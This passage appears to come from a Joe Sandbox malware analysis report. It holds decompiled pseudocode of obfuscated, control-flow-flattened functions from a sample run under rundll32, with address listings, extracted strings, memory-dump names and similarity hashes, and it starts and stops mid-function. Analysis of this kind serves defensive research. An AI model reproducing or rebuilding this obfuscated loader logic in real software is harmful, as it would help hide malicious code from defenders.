				_v1696 = _v1696 ^ 0x0002db53;
				_v1760 = 0x3df4;
				_v1760 = _v1760 * 0x61;
				_v1760 = _v1760 << 5;
				_v1760 = _v1760 / _t520;
				_v1760 = _v1760 ^ 0x000da470;
				_v1588 = 0x721a;
				_t521 = 0x47;
				_v1588 = _v1588 / _t521;
				_v1588 = _v1588 ^ 0x0000070f;
				_v1752 = 0x8c93;
				_v1752 = _v1752 << 0xa;
				_v1752 = _v1752 << 0xb;
				_v1752 = _v1752 | 0xe01a6e70;
				_v1752 = _v1752 ^ 0xf27a671c;
				_v1644 = 0xefc8;
				_t522 = 0x6d;
				_v1644 = _v1644 / _t522;
				_v1644 = _v1644 ^ 0x739099de;
				_v1644 = _v1644 ^ 0x7390cdd9;
				_v1596 = 0x1ffd;
				_v1596 = _v1596 ^ 0x86e06afb;
				_v1596 = _v1596 ^ 0x86e015b5;
				_v1652 = 0xc429;
				_v1652 = _v1652 >> 0xf;
				_v1652 = _v1652 >> 6;
				_v1652 = _v1652 ^ 0x00006789;
				_v1600 = 0x57b4;
				_t523 = 0x7f;
				_v1600 = _v1600 / _t523;
				_v1600 = _v1600 ^ 0x00007042;
				_v1744 = 0xf601;
				_t524 = 0x2d;
				_v1744 = _v1744 * 0x77;
				_v1744 = _v1744 * 0x2a;
				_v1744 = _v1744 * 0x2c;
				_v1744 = _v1744 ^ 0x397d78f9;
				_v1592 = 0x85ab;
				_v1592 = _v1592 << 4;
				_v1592 = _v1592 ^ 0x00082bb5;
				_v1720 = 0xd613;
				_v1720 = _v1720 + 0x2992;
				_v1720 = _v1720 << 1;
				_v1720 = _v1720 | 0xcb6149df;
				_v1720 = _v1720 ^ 0xcb61901b;
				_v1676 = 0x443b;
				_v1676 = _v1676 ^ 0xd199ed1f;
				_v1676 = _v1676 >> 2;
				_v1676 = _v1676 ^ 0x34667475;
				_v1608 = 0x7ce3;
				_v1608 = _v1608 ^ 0x2b9fed51;
				_v1608 = _v1608 ^ 0x2b9fdb73;
				_v1728 = 0xb946;
				_v1728 = _v1728 * 0x68;
				_v1728 = _v1728 * 0x6e;
				_v1728 = _v1728 << 0xe;
				_v1728 = _v1728 ^ 0xda080bad;
				_v1712 = 0xe175;
				_v1712 = _v1712 / _t524;
				_t525 = 0x68;
				_v1712 = _v1712 * 0x62;
				_v1712 = _v1712 | 0xebea7309;
				_v1712 = _v1712 ^ 0xebebb48d;
				_v1736 = 0xa5be;
				_v1736 = _v1736 + 0xffff1e6a;
				_v1736 = _v1736 >> 8;
				_v1736 = _v1736 ^ 0xa9a874dc;
				_v1736 = _v1736 ^ 0xa957bb08;
				_v1704 = 0x444d;
				_t180 =  &_v1704; // 0x444d
				_v1704 =  *_t180 * 0x38;
				_v1704 = _v1704 | 0xc313ec5d;
				_v1704 = _v1704 + 0xffffc096;
				_v1704 = _v1704 ^ 0xc31fa060;
				_v1668 = 0x6d52;
				_t189 =  &_v1668; // 0x6d52
				_v1668 =  *_t189 * 0x65;
				_v1668 = _v1668 ^ 0xbf90cb27;
				_v1668 = _v1668 ^ 0xbfbbe0fd;
				_v1584 = 0x2582;
				_v1584 = _v1584 ^ 0xe6613b83;
				_v1584 = _v1584 ^ 0xe6615551;
				_v1764 = 0x94b;
				_v1764 = _v1764 + 0x67c4;
				_v1764 = _v1764 / _t525;
				_v1764 = _v1764 >> 3;
				_v1764 = _v1764 ^ 0x00001cca;
				_v1688 = 0x9e3b;
				_v1688 = _v1688 + 0x5941;
				_v1688 = _v1688 << 2;
				_v1688 = _v1688 ^ 0x0003cfbe;
				_v1748 = 0x3388;
				_v1748 = _v1748 >> 0xf;
				_v1748 = _v1748 ^ 0x81f115bf;
				_v1748 = _v1748 + 0xffff7117;
				_v1748 = _v1748 ^ 0x81f0c6d8;
				_v1620 = 0xeec5;
				_v1620 = _v1620 ^ 0x04d4525c;
				_v1620 = _v1620 ^ 0x04d4ab65;
				_v1624 = 0xdb2c;
				_v1624 = _v1624 << 1;
				_v1624 = _v1624 ^ 0x0001fe72;
				_v1580 = 0xb060;
				_v1580 = _v1580 + 0xae2;
				_v1580 = _v1580 ^ 0x0000f768;
				_v1660 = 0x96fa;
				_v1660 = _v1660 << 5;
				_v1660 = _v1660 | 0x6168c04a;
				_v1660 = _v1660 ^ 0x617aedf0;
				_v1672 = 0x7987;
				_v1672 = _v1672 | 0xba6a9da0;
				_v1672 = _v1672 + 0x37d3;
				_v1672 = _v1672 ^ 0xba6b374e;
				_v1680 = 0x436a;
				_v1680 = _v1680 + 0xffff28b9;
				_v1680 = _v1680 ^ 0xc211608a;
				_v1680 = _v1680 ^ 0x3dee43d2;
				_v1740 = 0x7dd0;
				_v1740 = _v1740 ^ 0x30cdb3c0;
				_v1740 = _v1740 ^ 0xa86be54c;
				_v1740 = _v1740 + 0xffffb5e9;
				_v1740 = _v1740 ^ 0x98a5bc8c;
				_v1612 = 0x1a91;
				_v1612 = _v1612 << 0xe;
				_v1612 = _v1612 ^ 0x06a46876;
				_v1664 = 0x6ac2;
				_v1664 = _v1664 ^ 0xd8b61fc6;
				_v1664 = _v1664 ^ 0x1ea3be60;
				_v1664 = _v1664 ^ 0xc615e743;
				_v1732 = 0x55c4;
				_v1732 = _v1732 >> 0xf;
				_v1732 = _v1732 + 0xffffedaa;
				_t526 = 0xa;
				_v1732 = _v1732 * 0x58;
				_v1732 = _v1732 ^ 0xfff9af4a;
				_v1604 = 0x92de;
				_v1604 = _v1604 >> 8;
				_v1604 = _v1604 ^ 0x000052ef;
				_v1640 = 0x375a;
				_v1640 = _v1640 ^ 0x8d7c695b;
				_t527 = 0x12;
				_v1640 = _v1640 / _t526;
				_v1640 = _v1640 ^ 0x0e263cba;
				_v1708 = 0xa848;
				_v1708 = _v1708 << 2;
				_v1708 = _v1708 + 0xffff4f47;
				_v1708 = _v1708 >> 0x10;
				_v1708 = _v1708 ^ 0x00004df5;
				_v1716 = 0x3304;
				_v1716 = _v1716 ^ 0x61e3d3e4;
				_v1716 = _v1716 + 0x5bdd;
				_v1716 = _v1716 + 0xffffa59f;
				_v1716 = _v1716 ^ 0x61e3ceb5;
				_v1648 = 0x6dc4;
				_v1648 = _v1648 | 0x8611d38f;
				_v1648 = _v1648 << 8;
				_v1648 = _v1648 ^ 0x11ffcc6f;
				_v1656 = 0x328f;
				_v1656 = _v1656 * 0x7c;
				_v1656 = _v1656 + 0xeaba;
				_v1656 = _v1656 ^ 0x00191fbe;
				_v1632 = 0x61f7;
				_v1632 = _v1632 / _t527;
				_t528 = 0x58;
				_v1632 = _v1632 / _t528;
				_v1632 = _v1632 ^ 0x00002538;
				_v1692 = 0x1be6;
				_v1692 = _v1692 | 0x9feafdcd;
				_v1692 = _v1692 << 2;
				_v1692 = _v1692 | 0x8d482522;
				_v1692 = _v1692 ^ 0xffebf3eb;
				_v1700 = 0x9b1b;
				_t529 = 0x31;
				_t516 = _v1576;
				_v1700 = _v1700 / _t529;
				_v1700 = _v1700 * 0x73;
				_v1700 = _v1700 << 0xe;
				_v1700 = _v1700 ^ 0x5af7f17e;
				_v1724 = 0xca47;
				_v1724 = _v1724 << 0xd;
				_v1724 = _v1724 >> 5;
				_v1724 = _v1724 + 0xd0a1;
				_v1724 = _v1724 ^ 0x00cb17a0;
				while(1) {
					L1:
					_t530 = 0x5c;
					while(1) {
						L2:
						_t493 = 0x6df7a4c;
						do {
							L3:
							if(_t581 == _t493) {
								_t495 = E0020BBAB(_v1664, _v1732,  &_v1560, _v1604);
								_pop(_t533);
								_t497 = E0020EC06(_v1640,  &_v1560, _v1708, _t516, _v1572, _t533, _v1716, _v1648, 2 + _t495 * 2, _v1724, _v1656);
								_t586 =  &(_t586[9]);
								__eflags = _t497;
								_t581 = 0x2a46bc81;
								_t448 = _t497 == 0;
								__eflags = _t448;
								_v1576 = 0 | _t448;
								goto L17;
							} else {
								if(_t581 == 0xbbbecbf) {
									_t518 =  *0x2121b0 + 0x10;
									while(1) {
										__eflags =  *_t518 - _t530;
										if(__eflags == 0) {
											break;
										}
										_t518 = _t518 + 2;
										__eflags = _t518;
									}
									_t516 = _t518 + 2;
									_t581 = 0x2529a265;
									goto L2;
								} else {
									if(_t581 == 0x2529a265) {
										_push(0x1f1080);
										_push(_v1764);
										_t499 = E0020BF25(_v1668, _v1584, __eflags);
										_pop(_t539);
										_t425 =  &_v1624; // 0xe6615551
										__eflags = E00203659(_v1688, _v1748, _v1620,  *_t425, _v1580, _t539,  &_v1572, _v1660, _t539, _t539, _t499, _t539, _v1756, _v1636);
										_t581 =  ==  ? 0x6df7a4c : 0x1cdd012f;
										E0020C5F7(_v1672, _v1680, _v1740, _v1612, _t499);
										_t586 =  &(_t586[0x10]);
										L17:
										_t493 = 0x6df7a4c;
										_t530 = 0x5c;
										goto L18;
									} else {
										if(_t581 == 0x2a46bc81) {
											E00205483(_v1632, _v1692, _v1700, _v1572);
										} else {
											if(_t581 == 0x2a61740b) {
												_push(0x1f1020);
												_push(_v1596);
												_t505 = E0020BF25(_v1752, _v1644, __eflags);
												E002073C0( &_v1040, __eflags);
												E001F3482(_v1600, __eflags,  &_v520,  &_v1560, _v1744, _v1592,  &_v1040,  *0x2121b0 + 0x234, 0x104,  *0x2121b0 + 0x10, _t505, _v1720, _v1676, _v1608);
												E0020C5F7(_v1728, _v1712, _v1736, _v1704, _t505);
												_t586 =  &(_t586[0x11]);
												_t581 = 0xbbbecbf;
												goto L1;
											} else {
												if(_t581 != 0x3875c21b) {
													goto L18;
												} else {
													_push(_t530);
													E001F1D54(_v1684, _t530, _v1628, _v1696, _v1760,  &_v520, _v1588, _v1616);
													_t586 =  &(_t586[8]);
													_t581 = 0x2a61740b;
													while(1) {
														L1:
														_t530 = 0x5c;
														L2:
														_t493 = 0x6df7a4c;
														goto L3;
													}
												}
											}
										}
									}
								}
							}
							L21:
							return _v1576;
							L18:
							__eflags = _t581 - 0x1cdd012f;
						} while (__eflags != 0);
						goto L21;
					}
				}
			}

0x0020f411
0x0020f417
0x0020f424
0x0020f42d
0x0020f438
0x0020f440
0x0020f44b
0x0020f456
0x0020f45e
0x0020f469
0x0020f474
0x0020f47c
0x0020f484
0x0020f48d
0x0020f494
0x0020f49f
0x0020f4a4
0x0020f4aa
0x0020f4b2
0x0020f4bf
0x0020f4c2
0x0020f4cb
0x0020f4cf
0x0020f4d7
0x0020f4ea
0x0020f4f1
0x0020f4fc
0x0020f504
0x0020f509
0x0020f50e
0x0020f512
0x0020f51a
0x0020f527
0x0020f52b
0x0020f538
0x0020f53c
0x0020f544
0x0020f556
0x0020f55b
0x0020f564
0x0020f56f
0x0020f577
0x0020f57c
0x0020f581
0x0020f589
0x0020f591
0x0020f5a3
0x0020f5a6
0x0020f5ad
0x0020f5b8
0x0020f5c3
0x0020f5ce
0x0020f5d9
0x0020f5e4
0x0020f5ef
0x0020f5f7
0x0020f5ff
0x0020f60a
0x0020f620
0x0020f625
0x0020f62e
0x0020f639
0x0020f646
0x0020f649
0x0020f652
0x0020f65b
0x0020f65f
0x0020f667
0x0020f672
0x0020f67a
0x0020f685
0x0020f68d
0x0020f695
0x0020f699
0x0020f6a1
0x0020f6a9
0x0020f6b1
0x0020f6b9
0x0020f6be
0x0020f6c6
0x0020f6d1
0x0020f6dc
0x0020f6e7
0x0020f6f4
0x0020f6fd
0x0020f701
0x0020f706
0x0020f70e
0x0020f71e
0x0020f727
0x0020f728
0x0020f72c
0x0020f734
0x0020f73c
0x0020f744
0x0020f74c
0x0020f751
0x0020f759
0x0020f761
0x0020f769
0x0020f76e
0x0020f772
0x0020f77a
0x0020f782
0x0020f78a
0x0020f792
0x0020f797
0x0020f79b
0x0020f7a3
0x0020f7ab
0x0020f7b6
0x0020f7c1
0x0020f7cc
0x0020f7d4
0x0020f7e2
0x0020f7e6
0x0020f7eb
0x0020f7f3
0x0020f7fb
0x0020f803
0x0020f808
0x0020f812
0x0020f81a
0x0020f81f
0x0020f827
0x0020f82f
0x0020f837
0x0020f842
0x0020f84d
0x0020f858
0x0020f863
0x0020f86a
0x0020f875
0x0020f880
0x0020f88b
0x0020f896
0x0020f89e
0x0020f8a3
0x0020f8ab
0x0020f8b3
0x0020f8bb
0x0020f8c3
0x0020f8cb
0x0020f8d3
0x0020f8db
0x0020f8e3
0x0020f8eb
0x0020f8f3
0x0020f8fb
0x0020f903
0x0020f90b
0x0020f913
0x0020f91b
0x0020f926
0x0020f92e
0x0020f939
0x0020f941
0x0020f949
0x0020f951
0x0020f959
0x0020f961
0x0020f966
0x0020f975
0x0020f978
0x0020f97c
0x0020f984
0x0020f98f
0x0020f997
0x0020f9a2
0x0020f9ad
0x0020f9c1
0x0020f9c2
0x0020f9c9
0x0020f9d4
0x0020f9dc
0x0020f9e1
0x0020f9e9
0x0020f9ee
0x0020f9f6
0x0020f9fe
0x0020fa06
0x0020fa0e
0x0020fa16
0x0020fa1e
0x0020fa29
0x0020fa34
0x0020fa3c
0x0020fa47
0x0020fa54
0x0020fa58
0x0020fa60
0x0020fa6a
0x0020fa80
0x0020fa95
0x0020fa9a
0x0020faa3
0x0020faae
0x0020fab6
0x0020fabe
0x0020fac3
0x0020facb
0x0020fad3
0x0020fadf
0x0020fae2
0x0020fae9
0x0020faf2
0x0020faf6
0x0020fafb
0x0020fb03
0x0020fb0b
0x0020fb10
0x0020fb15
0x0020fb1d
0x0020fb25
0x0020fb25
0x0020fb27
0x0020fb28
0x0020fb28
0x0020fb28
0x0020fb2d
0x0020fb2d
0x0020fb2f
0x0020fd1d
0x0020fd23
0x0020fd5a
0x0020fd61
0x0020fd64
0x0020fd66
0x0020fd6b
0x0020fd6b
0x0020fd6e
0x00000000
0x0020fb35
0x0020fb3b
0x0020fcef
0x0020fcf7
0x0020fcf7
0x0020fcfa
0x00000000
0x00000000
0x0020fcf4
0x0020fcf4
0x0020fcf4
0x0020fcfc
0x0020fcff
0x00000000
0x0020fb41
0x0020fb43
0x0020fc52
0x0020fc57
0x0020fc66
0x0020fc6c
0x0020fc95
0x0020fcbb
0x0020fcd9
0x0020fcdc
0x0020fce1
0x0020fd75
0x0020fd77
0x0020fd7c
0x00000000
0x0020fb49
0x0020fb4f
0x0020fda1
0x0020fb55
0x0020fb5b
0x0020fba3
0x0020fba8
0x0020fbba
0x0020fbc8
0x0020fc24
0x0020fc40
0x0020fc45
0x0020fc48
0x00000000
0x0020fb5d
0x0020fb63
0x00000000
0x0020fb69
0x0020fb69
0x0020fb94
0x0020fb99
0x0020fb9c
0x0020fb25
0x0020fb25
0x0020fb27
0x0020fb28
0x0020fb28
0x00000000
0x0020fb28
0x0020fb25
0x0020fb63
0x0020fb5b
0x0020fb4f
0x0020fb43
0x0020fb3b
0x0020fda8
0x0020fdb9
0x0020fd7d
0x0020fd7d
0x0020fd7d
0x00000000
0x0020fd89
0x0020fb28

Strings

R, xrefs: 0020F997
MDu, xrefs: 0020F769
u, xrefs: 0020F70E
Z7, xrefs: 0020F9A2
AY, xrefs: 0020F7FB
1{, xrefs: 0020F42D
K, xrefs: 0020F7CC
n9, xrefs: 0020F4D7
Rmutf4, xrefs: 0020F792
utf4, xrefs: 0020F6BE
s, xrefs: 0020F72C
8%, xrefs: 0020FAA3
|, xrefs: 0020F6C6
jC, xrefs: 0020F8D3
Bp, xrefs: 0020F62E
QUa, xrefs: 0020FC95

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: s$1{$8%$AY$Bp$K$MDu$QUa$Rmutf4$Z7$jC$n9$utf4$u$R$|
API String ID: 0-2491655032
Opcode ID: c8697d426f3f458d679b1ee176e09d65529c5c914c6ae91b4d4c7494595493bb
Instruction ID: 248dae99315b4a6b9a92cff62dcc7a70e2a4ca4608a7e697fad370ba33895c1a
Opcode Fuzzy Hash: c8697d426f3f458d679b1ee176e09d65529c5c914c6ae91b4d4c7494595493bb
Instruction Fuzzy Hash: 503203715083809FE369CF24C98AB9FBBE1FBC4344F10891DE29A862A1D7B59559CF03

Uniqueness

Uniqueness Score: -1.00%

Function 002AE985, Relevance: 20.4, Strings: 16, Instructions: 435COMMON

Download Yara Rule

Strings

MDu, xrefs: 002AECDD
|, xrefs: 002AEC3A
jC, xrefs: 002AEE47
Rmutf4, xrefs: 002AED06
u, xrefs: 002AEC82
AY, xrefs: 002AED6F
R, xrefs: 002AEF0B
K, xrefs: 002AED40
n9, xrefs: 002AEA4B
Bp, xrefs: 002AEBA2
utf4, xrefs: 002AEC32
s, xrefs: 002AECA0
QUa, xrefs: 002AF209
1{, xrefs: 002AE9A1
Z7, xrefs: 002AEF16
8%, xrefs: 002AF017

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: s$1{$8%$AY$Bp$K$MDu$QUa$Rmutf4$Z7$jC$n9$utf4$u$R$|
API String ID: 0-2491655032
Opcode ID: 9154ac27042b575144f2ca61fdeaf32e06ec23342cca407034056ef9504bf0c7
Instruction ID: 16bace68f35f442da15461ffeaeaa37f5d645661a1e723c002b69574c56ff5b9
Opcode Fuzzy Hash: 9154ac27042b575144f2ca61fdeaf32e06ec23342cca407034056ef9504bf0c7
Instruction Fuzzy Hash: 4032F371508380DFE369CF25C98AA8BBBE1BBC5344F10891DE19A862A1D7B59559CF03

Uniqueness

Uniqueness Score: -1.00%

Function 001FF813, Relevance: 20.4, Strings: 16, Instructions: 429
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E001FF813() {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				signed int _v1572;
				intOrPtr* _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				unsigned int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				signed int _v1768;
				signed int _v1772;
				intOrPtr* _t473;
				void* _t479;
				intOrPtr* _t489;
				void* _t491;
				void* _t522;
				signed int _t530;
				signed int _t531;
				signed int _t532;
				signed int _t533;
				signed int _t534;
				signed int _t535;
				signed int _t536;
				signed int _t537;
				signed int _t538;
				signed int _t539;
				intOrPtr _t540;
				intOrPtr* _t542;
				intOrPtr* _t543;
				signed int* _t547;
				void* _t550;

				_t547 =  &_v1772;
				_v1564 = 0xa43e;
				_v1564 = _v1564 ^ 0x45b26b29;
				_t491 = 0x29fd4c8c;
				_v1564 = _v1564 ^ 0x45b2cf3e;
				_v1604 = 0xd832;
				_v1604 = _v1604 << 7;
				_v1604 = _v1604 ^ 0x006c754a;
				_v1676 = 0xea82;
				_v1676 = _v1676 | 0xeffbbfdd;
				_v1676 = _v1676 ^ 0xeffbe896;
				_v1744 = 0x2481;
				_v1744 = _v1744 << 6;
				_v1744 = _v1744 + 0x9ec7;
				_v1744 = _v1744 + 0x8a8;
				_v1744 = _v1744 ^ 0x0009f1d1;
				_v1580 = 0x9f5;
				_v1580 = _v1580 | 0x253f9e02;
				_v1580 = _v1580 ^ 0x253fa85d;
				_v1612 = 0xe62c;
				_v1612 = _v1612 ^ 0xf7e1e6dc;
				_v1612 = _v1612 ^ 0xf7e121db;
				_v1644 = 0xa597;
				_v1644 = _v1644 << 3;
				_v1644 = _v1644 ^ 0x00057224;
				_v1636 = 0x74cb;
				_v1636 = _v1636 | 0x8dfb5c1d;
				_v1636 = _v1636 ^ 0x8dfb1908;
				_v1672 = 0xf927;
				_t530 = 0x47;
				_v1672 = _v1672 / _t530;
				_v1672 = _v1672 << 8;
				_t543 = 0;
				_v1672 = _v1672 ^ 0x0003eef2;
				_v1684 = 0xe8df;
				_v1684 = _v1684 ^ 0xe48f8edf;
				_t531 = 0x4b;
				_v1576 = 0;
				_v1684 = _v1684 * 0xe;
				_v1684 = _v1684 ^ 0x7fd7efbf;
				_v1572 = 0xd38b;
				_v1572 = _v1572 | 0x212f5c39;
				_v1572 = _v1572 ^ 0x212fa689;
				_v1652 = 0x1200;
				_v1652 = _v1652 / _t531;
				_v1652 = _v1652 ^ 0x00000a2b;
				_v1596 = 0x13dd;
				_v1596 = _v1596 | 0xceb868f3;
				_v1596 = _v1596 ^ 0xceb84d66;
				_v1768 = 0x3bb1;
				_v1768 = _v1768 + 0xffff0d17;
				_v1768 = _v1768 >> 7;
				_v1768 = _v1768 >> 6;
				_v1768 = _v1768 ^ 0x0007e300;
				_v1716 = 0xf0d2;
				_v1716 = _v1716 + 0xe075;
				_v1716 = _v1716 ^ 0x9b47385c;
				_v1716 = _v1716 ^ 0x9b46cdd4;
				_v1660 = 0x69dd;
				_v1660 = _v1660 | 0x8bdea621;
				_v1660 = _v1660 << 0x10;
				_v1660 = _v1660 ^ 0xeffd1439;
				_v1760 = 0x4063;
				_v1760 = _v1760 << 6;
				_v1760 = _v1760 * 0x7c;
				_v1760 = _v1760 ^ 0xd256c198;
				_v1760 = _v1760 ^ 0xd59d1bc0;
				_v1628 = 0x90dd;
				_v1628 = _v1628 + 0xffff497e;
				_v1628 = _v1628 ^ 0xffffd705;
				_v1736 = 0xfcae;
				_t532 = 0x46;
				_v1736 = _v1736 / _t532;
				_v1736 = _v1736 + 0xcadb;
				_v1736 = _v1736 ^ 0x517b85fd;
				_v1736 = _v1736 ^ 0x517b3d77;
				_v1708 = 0xaa4c;
				_t533 = 0xd;
				_v1708 = _v1708 * 0x56;
				_v1708 = _v1708 | 0x843164d5;
				_v1708 = _v1708 ^ 0x84391434;
				_v1688 = 0x7b92;
				_v1688 = _v1688 + 0x23d3;
				_v1688 = _v1688 | 0xa0cceb2c;
				_v1688 = _v1688 ^ 0xa0ccf5a5;
				_v1696 = 0x2f42;
				_v1696 = _v1696 + 0xffffada6;
				_v1696 = _v1696 + 0xffffd11c;
				_v1696 = _v1696 ^ 0xffff8010;
				_v1704 = 0x664;
				_v1704 = _v1704 << 6;
				_v1704 = _v1704 << 4;
				_v1704 = _v1704 ^ 0x001991ab;
				_v1600 = 0x17c3;
				_v1600 = _v1600 * 0x6e;
				_v1600 = _v1600 ^ 0x000a4796;
				_v1756 = 0x876e;
				_v1756 = _v1756 ^ 0xccadfb01;
				_v1756 = _v1756 / _t533;
				_v1756 = _v1756 | 0x71b05a4c;
				_v1756 = _v1756 ^ 0x7fbe83ae;
				_v1608 = 0xc50f;
				_t534 = 0x7e;
				_v1608 = _v1608 / _t534;
				_v1608 = _v1608 ^ 0x00000e7d;
				_v1712 = 0xe559;
				_v1712 = _v1712 | 0xff7f7fff;
				_v1712 = _v1712 ^ 0xff7fd517;
				_v1720 = 0x1170;
				_v1720 = _v1720 * 0x2e;
				_v1720 = _v1720 | 0xa70aa585;
				_v1720 = _v1720 ^ 0xa70bab82;
				_v1724 = 0x666c;
				_v1724 = _v1724 | 0x8fee4b7f;
				_v1724 = _v1724 ^ 0x8fee281e;
				_v1772 = 0xf606;
				_v1772 = _v1772 ^ 0x11a63a32;
				_v1772 = _v1772 >> 1;
				_v1772 = _v1772 | 0xbd41a285;
				_v1772 = _v1772 ^ 0xbdd3c841;
				_v1624 = 0xc87;
				_v1624 = _v1624 << 8;
				_v1624 = _v1624 ^ 0x000cb845;
				_v1632 = 0xcf71;
				_v1632 = _v1632 + 0x859a;
				_v1632 = _v1632 ^ 0x000172a0;
				_v1640 = 0x9b4e;
				_v1640 = _v1640 + 0xfffffeb0;
				_v1640 = _v1640 ^ 0x0000b068;
				_v1752 = 0x51f0;
				_v1752 = _v1752 << 0xd;
				_v1752 = _v1752 * 9;
				_v1752 = _v1752 ^ 0xa73676e0;
				_v1752 = _v1752 ^ 0xfb182fbc;
				_v1568 = 0x8b8;
				_v1568 = _v1568 | 0x4447cdf9;
				_v1568 = _v1568 ^ 0x4447aa39;
				_v1732 = 0xaa2a;
				_t535 = 0x4c;
				_v1732 = _v1732 / _t535;
				_v1732 = _v1732 >> 7;
				_v1732 = _v1732 | 0x5d199c15;
				_v1732 = _v1732 ^ 0x5d19ea5e;
				_v1740 = 0x9be5;
				_v1740 = _v1740 ^ 0x27ebeb7e;
				_v1740 = _v1740 >> 6;
				_v1740 = _v1740 << 0xc;
				_v1740 = _v1740 ^ 0xfadc41bb;
				_v1748 = 0xab1f;
				_v1748 = _v1748 >> 0xd;
				_v1748 = _v1748 | 0x2e03c9c9;
				_t536 = 0x78;
				_v1748 = _v1748 * 0x61;
				_v1748 = _v1748 ^ 0x6f6f6458;
				_v1680 = 0x432d;
				_v1680 = _v1680 << 9;
				_v1680 = _v1680 + 0xaa9a;
				_v1680 = _v1680 ^ 0x008720ae;
				_v1620 = 0xb695;
				_v1620 = _v1620 | 0x9c0d8b30;
				_v1620 = _v1620 ^ 0x9c0dd91b;
				_v1700 = 0x7cda;
				_v1700 = _v1700 / _t536;
				_v1700 = _v1700 << 5;
				_v1700 = _v1700 ^ 0x00004203;
				_v1668 = 0xca1;
				_v1668 = _v1668 << 6;
				_v1668 = _v1668 + 0xfb4a;
				_v1668 = _v1668 ^ 0x00041992;
				_v1588 = 0x2832;
				_v1588 = _v1588 + 0xffff4b77;
				_v1588 = _v1588 ^ 0xffff7d0e;
				_v1584 = 0xd717;
				_v1584 = _v1584 + 0x8534;
				_v1584 = _v1584 ^ 0x00011bb2;
				_v1656 = 0x6f3e;
				_v1656 = _v1656 >> 0xc;
				_t537 = 0x2b;
				_v1656 = _v1656 / _t537;
				_v1656 = _v1656 ^ 0x00003e2a;
				_v1664 = 0x8f26;
				_v1664 = _v1664 >> 6;
				_v1664 = _v1664 << 2;
				_v1664 = _v1664 ^ 0x0000651c;
				_v1728 = 0xe7d3;
				_v1728 = _v1728 << 0xd;
				_t538 = 0x2a;
				_v1728 = _v1728 / _t538;
				_v1728 = _v1728 ^ 0x00b0dbe1;
				_v1592 = 0xd2ea;
				_t539 = 0x52;
				_v1592 = _v1592 / _t539;
				_v1592 = _v1592 ^ 0x000f02ad;
				_v1692 = 0x3985;
				_t546 = _v1576;
				_t490 = _v1576;
				_t540 = _v1576;
				_v1692 = _v1692 * 0x1b;
				_v1692 = _v1692 ^ 0x0e34e665;
				_v1692 = _v1692 ^ 0x0e32f760;
				_v1616 = 0x5c84;
				_v1616 = _v1616 >> 0xd;
				_v1764 = 0x6db6;
				_v1764 = _v1764 << 9;
				_v1764 = _v1764 + 0xffff9705;
				_v1764 = _v1764 | 0x2711d9d9;
				_v1764 = _v1764 ^ 0x27dbdbdd;
				_v1648 = 0x109c;
				_v1648 = _v1648 + 0x526d;
				_v1648 = _v1648 ^ 0x00006319;
				while(1) {
					L1:
					_t522 = 0x5c;
					do {
						while(1) {
							L2:
							_t550 = _t491 - 0x29fd4c8c;
							if(_t550 > 0) {
								break;
							}
							if(_t550 == 0) {
								_push(_t491);
								E001F1D54(_v1604, _t491, _v1676, _v1744, _v1580,  &_v1040, _v1612, _v1564);
								_t547 =  &(_t547[8]);
								_t491 = 0x1e06f250;
								while(1) {
									L1:
									_t522 = 0x5c;
									goto L2;
								}
							} else {
								if(_t491 == 0x2d4cd3b) {
									_t542 =  *0x2121b0 + 0x10;
									while(1) {
										__eflags =  *_t542 - _t522;
										if(__eflags == 0) {
											break;
										}
										_t542 = _t542 + 2;
										__eflags = _t542;
									}
									_t540 = _t542 + 2;
									_t491 = 0x2f9aa500;
									continue;
								} else {
									if(_t491 == 0x10ed6b66) {
										E0020F23C(_v1584, _t490, _v1656, _v1664, _v1728);
									} else {
										if(_t491 == 0x140b5383) {
											E0020F23C(_v1620, _t546, _v1700, _v1668, _v1588);
											_t547 =  &(_t547[3]);
											L10:
											_t491 = 0x10ed6b66;
											while(1) {
												L1:
												_t522 = 0x5c;
												goto L2;
											}
										} else {
											_t554 = _t491 - 0x1e06f250;
											if(_t491 != 0x1e06f250) {
												goto L24;
											} else {
												_push(0x1f1020);
												_push(_v1672);
												_t479 = E0020BF25(_v1644, _v1636, _t554);
												E002073C0( &_v1560, _t554);
												E001F3482(_v1572, _t554,  &_v1040,  &_v520, _v1652, _v1596,  &_v1560,  *0x2121b0 + 0x234, 0x104,  *0x2121b0 + 0x10, _t479, _v1768, _v1716, _v1660);
												E0020C5F7(_v1760, _v1628, _v1736, _v1708, _t479);
												_t543 = _v1576;
												_t547 =  &(_t547[0x11]);
												_t491 = 0x2d4cd3b;
												while(1) {
													L1:
													_t522 = 0x5c;
													goto L2;
												}
											}
										}
									}
								}
							}
							L27:
							return _t543;
						}
						__eflags = _t491 - 0x2a58a6fb;
						if(_t491 == 0x2a58a6fb) {
							E001F620A(_v1732, _v1740, _v1748, _v1680, _t490, _t546);
							_t547 =  &(_t547[4]);
							_t491 = 0x140b5383;
							_t522 = 0x5c;
